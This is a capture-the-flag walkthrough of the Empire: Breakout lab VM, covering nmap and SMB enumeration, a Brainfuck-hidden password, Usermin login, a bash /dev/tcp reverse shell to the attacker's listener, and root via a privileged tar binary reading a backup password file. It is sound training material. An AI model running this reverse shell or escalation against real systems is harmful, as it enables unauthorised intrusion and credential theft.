From my previous article, we have completed the first vulhub box of the Empire series.
The Walkthrough:-
Step 1:- (Enumeration)
find out the target IP address using NetDiscover.
┌─(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0
From the Scanning, we have discovered our target IP address which is 192.168.56.104. We have discovered the IP address, so let’s perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:
- -p- : select all open ports
- -A : Enable OS detection, version detection, script scanning, and traceroute
- -T : To specify the time.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nmap -p- -A -T 4 192.168.56.104
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 12:02 IST
Nmap scan report for 192.168.56.104
Host is up (0.00068s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (97%), QEMU (92%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (97%), QEMU user mode network gateway (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Host script results:
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-03-14T06:33:57
|_ start_date: N/A
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.34 ms 10.0.3.2
2 0.40 ms 192.168.56.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.51 secondsFrom the Nmap output, we have found five open ports.
- Port 80/TCP running an HTTP service, which indicates that there might be a website running.
- Port 139/TCP and 445/TCP are both sharing the same service NetBios SSN.
- Port 10000/TCP and 20000/TCP are both running HTTP services.
Let’s look at the contents, we can open a web browser and navigate to the target’s IP address in the URL bar at the top of the window.
From the output, we have noticed that the running website is a default page of Apache 2 HTTP service. Nothing seems to be of interest here, so, let’s take a look at the content of the other two Ports.
The running webpage shows a login form to log in to Webmin. If we have valid credentials then we can manage to get login access and a foothold on the server.
Step 2:- (Foothold)
From the Nmap scan, we have found two open ports running the NetBIOS-SSN service.
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2I have a write-up similar to this Port, click here:- https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb Let’s enumerate the SMB shares using enum4linux. It is basically a wrapper around the tools in the Samba package and makes it easy to quickly extract information from the target pertaining to SMB.
┌──(rootharsh㉿kali)-[~]
└─$ smbclient -L //192.168.56.104/
Password for [WORKGROUP\rootharsh]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available┌──(rootharsh㉿kali)-[~]
└─$ enum4linux -a 192.168.56.104
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 14 15:14:43 2023
=========================================( Target Information )=========================================
Target ........... 192.168.56.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.104 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.56.104 )===============================
Looking up status of 192.168.56.104
BREAKOUT <00> - B <ACTIVE> Workstation Service
BREAKOUT <03> - B <ACTIVE> Messenger Service
BREAKOUT <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 192.168.56.104 )==================================
[+] Server 192.168.56.104 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.56.104 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.56.104 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.56.104 from srvinfo:
BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.56.104 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.56.104 )================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.56.104
//192.168.56.104/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.56.104/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.56.104 )===========================
[+] Attaching to 192.168.56.104 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BREAKOUT
[+] Builtin
[+] Password Info for Domain: BREAKOUT
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.56.104 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.56.104 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
==============================( Getting printer info for 192.168.56.104 )==============================
No printers returned.
enum4linux complete on Tue Mar 14 15:15:18 2023
┌──(rootharsh㉿kali)-[~]
└─$ From the output, we have identified a Local user cyber, which might help us in terms of login with the Webmin. Now we have a username, we only need the password to get the login access. If you take a look at the page source code of the Apache2 Debian default page, then you will find out an encrypted message.
The encrypted ciphertext seems to be in form of brain fuck algorithm. Open the browser and search for the brainfuck decoder(https://www.dcode.fr/brainfuck-language). Paste here the ciphertext and execute it.
On successful execution, you will be found a password. Now, we have a valid username(cyber) and password, so let’s try to log in with the web portal of Port 20000.
The login was successful and displayed with the ‘Usermin’ application dashboard.
Run Command Shell from USERMIN Dashboard >> Login >> Command Shell.
Next, run the ls command to list the files and the directories contents. As a result, we found the user.txt.
Open this using the cat command.
Let’s create a Bash reverse shell:
bash -i >& /dev/tcp/<LPORT>/4242 0>&1
Before running this script, you have turned on the Netcat listener on the port that you mentioned:
┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 4242
listening on [any] 4242 ..On Successful execution, you will find that reverse shell on Port 4242.
┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 39292
bash: cannot set terminal process group (1897): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
cyber@breakout:~$ export TERM=xterm
export TERM=xterm
cyber@breakout:~$Since this is not the root user, let’s identify further information about the target machine, which could be useful for gaining root access.
Step 3:- (Privilege Escalation)
Let’s identify the rights, and privileges of the current user by executing the sudo -l command:
cyber@breakout:~$ sudo -l
sudo -l
bash: sudo: command not foundThis error means the sudo command-line utility is not installed. As we have no rights, so we cannot install it. Now, we can only way to escalate the Privilege locally.
cyber@breakout:~$ ls -al
ls -al
total 568
drwxr-xr-x 8 cyber cyber 4096 Oct 20 2021 .
drwxr-xr-x 3 root root 4096 Oct 19 2021 ..
-rw------- 1 cyber cyber 0 Oct 20 2021 .bash_history
-rw-r--r-- 1 cyber cyber 220 Oct 19 2021 .bash_logout
-rw-r--r-- 1 cyber cyber 3526 Oct 19 2021 .bashrc
drwxr-xr-x 2 cyber cyber 4096 Oct 19 2021 .filemin
drwx------ 2 cyber cyber 4096 Oct 19 2021 .gnupg
drwxr-xr-x 3 cyber cyber 4096 Oct 19 2021 .local
-rw-r--r-- 1 cyber cyber 807 Oct 19 2021 .profile
drwx------ 2 cyber cyber 4096 Oct 19 2021 .spamassassin
-rwxr-xr-x 1 root root 531928 Oct 19 2021 tar
drwxr-xr-x 2 cyber cyber 4096 Oct 20 2021 .tmp
drwx------ 16 cyber cyber 4096 Oct 19 2021 .usermin
-rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txtAs our instance running HTTP Servers, so there might be some clue, so let’s take a look at the files and directories of the /vardirectory. Notice, that there is a backups directory listed in this same directory, so take a look at the content of the /backups directory.
cyber@breakout:~$ ls -al /var
ls -al /var
total 56
drwxr-xr-x 14 root root 4096 Oct 19 2021 .
drwxr-xr-x 18 root root 4096 Oct 19 2021 ..
drwxr-xr-x 2 root root 4096 Mar 14 03:06 backups
drwxr-xr-x 12 root root 4096 Oct 19 2021 cache
drwxr-xr-x 25 root root 4096 Oct 19 2021 lib
drwxrwsr-x 2 root staff 4096 Apr 10 2021 local
lrwxrwxrwx 1 root root 9 Oct 19 2021 lock -> /run/lock
drwxr-xr-x 8 root root 4096 Mar 14 02:21 log
drwxrwsr-x 2 root mail 4096 Oct 19 2021 mail
drwxr-xr-x 2 root root 4096 Oct 19 2021 opt
lrwxrwxrwx 1 root root 4 Oct 19 2021 run -> /run
drwxr-xr-x 5 root root 4096 Oct 19 2021 spool
drwxrwxrwt 5 root root 4096 Mar 14 02:21 tmp
drwxr-xr-x 3 root root 4096 Mar 14 02:21 usermin
drwx------ 3 root bin 4096 Mar 14 02:21 webmin
drwxr-xr-x 3 root root 4096 Oct 19 2021 wwwAs we have no privilege to read the content of the old_pass.bak file. If you take a look at the files and directories of the current directory previously you will have noticed a tar file which has root permission to read, write and execute.
-rwxr-xr-x 1 root root 531928 Oct 19 15:40 tarWhat is tar?
Tar is a computer software utility for collecting many files into one archive file, often referred to as a tarball, for distribution or backup purposes.
Let create an archive file called backup.tar file. Click on tar.
cyber@breakout:~$ ./tar -cf backup.tar /var/backups/.old_pass.bak
./tar -cf backup.tar /var/backups/.old_pass.bak
./tar: Removing leading `/’ from member names
cyber@breakout:~$ ls
ls
backup.tar tar user.txt
cyber@breakout:~$On successful execution you notice a tar archive in the current directory. Extract the archive and take a look at the content within it.
cyber@breakout:~$ tar -xf backup.tar
tar -xf backup.tar
cyber@breakout:~$ ls
ls
backup.tar tar user.txt var
cyber@breakout:~$ cd var
cd var
cyber@breakout:~/var$ ls
ls
backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls -al
ls -al
total 12
drwxr-xr-x 2 cyber cyber 4096 Feb 12 09:50 .
drwxr-xr-x 3 cyber cyber 4096 Feb 12 09:50 ..
-rw——- 1 cyber cyber 17 Oct 20 07:49 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$From the output we have spotted a password. So let’s try to login to the root user.
cyber@breakout:~/var/backups$ su root
su root
Password: Ts&4&YurgtRX(=~h
root@breakout:/home/cyber/var/backups#Finally, we have the root shell and verify using the “id” command.
root@breakout:/home/cyber/var/backups# id
id
uid=0(root) gid=0(root) groups=0(root)
root@breakout:/home/cyber/var/backups#It has been proven that it is the root simply change the directory to the /root path to obtain the root flag.
root@breakout:~# cd /root
cd /root
root@breakout:~# ls
ls
rOOt.txt
root@breakout:~# cat rOOt.txt
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
Author: Icex64 & Empire Cybersecurity
root@breakout:~#Congratulations! On completion of both Capture the Flags